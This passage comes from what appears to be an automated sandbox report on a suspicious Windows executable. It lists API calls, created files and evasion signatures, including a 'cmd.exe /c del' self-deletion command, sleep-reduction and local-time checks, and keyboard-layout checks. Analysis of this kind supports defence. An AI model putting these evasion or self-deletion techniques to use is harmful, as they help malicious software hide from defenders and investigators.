Static PE information: Image base 0x140000000 > 0x60000000

Source: Your File Is Ready To Download.exe

Static file information: File size 1217816 > 1048576

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic			Jump to behavior

Source: Your File Is Ready To Download.exe

Static PE information: certificate valid

Source: Your File Is Ready To Download.exe

Static PE information: section name: text

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_000000014009E010 SendMessageW,SendMessageW,SendMessageW,LoadLibraryW,GetProcAddress,SendMessageW,SendMessageW,SendMessageW,

1_2_000000014009E010

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe	Jump to behavior
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	File created: \your file is ready to download.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process created: C:\Windows\system32\cmd.exe /c del "C:\Users\user\Desktop\Your File Is Ready To Download.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140050076 IsZoomed,IsIconic,	1_2_0000000140050076
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140058660 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,GetClassNameW,EnumChildWindows,malloc,	1_2_0000000140058660
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,	1_2_0000000140054730
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140096770 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,	1_2_0000000140096770
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140096770 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,	1_2_0000000140096770
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009085D GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	1_2_000000014009085D
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009086D MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	1_2_000000014009086D
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140090865 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	1_2_0000000140090865
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009087B MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	1_2_000000014009087B
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009689B ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	1_2_000000014009689B
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140096891 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	1_2_0000000140096891
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400908BF MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	1_2_00000001400908BF
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400448D0 IsWindow,DestroyWindow,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDesktopWindow,GetWindowRect,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,IsWindow,CreateWindowExW,SendMessageW,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowRect,SendMessageW,SendMessageW,	1_2_00000001400448D0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400968C6 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	1_2_00000001400968C6
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400968F8 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	1_2_00000001400968F8
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400908F7 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	1_2_00000001400908F7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140090906 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	1_2_0000000140090906
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009694A ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	1_2_000000014009694A
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009699C ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	1_2_000000014009699C
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400569B0 SendMessageW,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,	1_2_00000001400569B0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400929C0 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetClientRect,MulDiv,MulDiv,_wcstoi64,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,	1_2_00000001400929C0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400969C7 MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	1_2_00000001400969C7
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014008EA20 SendMessageW,MulDiv,MulDiv,COMRefPtr,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawTextW,DrawTextW,GetCharABCWidthsW,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,SelectObject,ReleaseDC,SendMessageW,SendMessageW,GetClientRect,SetWindowLongW,SendMessageW,SetWindowLongW,MoveWindow,GetWindowRect,SendMessageW,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,MapWindowPoints,	1_2_000000014008EA20
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400B0AF0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,	1_2_00000001400B0AF0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014009CC50 SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,	1_2_000000014009CC50
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400B0CD0 GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,	1_2_00000001400B0CD0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140068FF0 GetTickCount,GetForegroundWindow,GetTickCount,GetWindowThreadProcessId,GetGUIThreadInfo,ClientToScreen,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_itow,	1_2_0000000140068FF0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400531B0 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,SelectObject,DeleteDC,DeleteObject,malloc,GetPixel,ReleaseDC,malloc,malloc,	1_2_00000001400531B0

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe

Code function: 1_2_0000000140018A20

1_2_0000000140018A20

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984

Thread sleep time: -2767011611056431s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140058D70 GetLocalTime followed by cmp: cmp word ptr [rbx], cx and CTI: je 00000001400590A3h		1_2_0000000140058D70
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140058D70 GetLocalTime followed by cmp: cmp dx, ax and CTI: je 0000000140058F63h		1_2_0000000140058D70

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_0000000140014BA0 GetKeyboardLayout followed by cmp: cmp ecx, 0ah and CTI: jl 0000000140014F02h country: Spanish (es)	1_2_0000000140014BA0
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_000000014001A400 GetKeyboardLayout followed by cmp: cmp dl, 00000019h and CTI: ja 000000014001A57Dh country: Russian (ru)	1_2_000000014001A400
Source: C:\Users\user\Desktop\Your File Is Ready To Download.exe	Code function: 1_2_00000001400226B7 GetKeyboardLayout followed by cmp: cmp ax, 0020h and CTI: je 00000001400228E9h country: Urdu (ur)	1_2_00000001400226B7
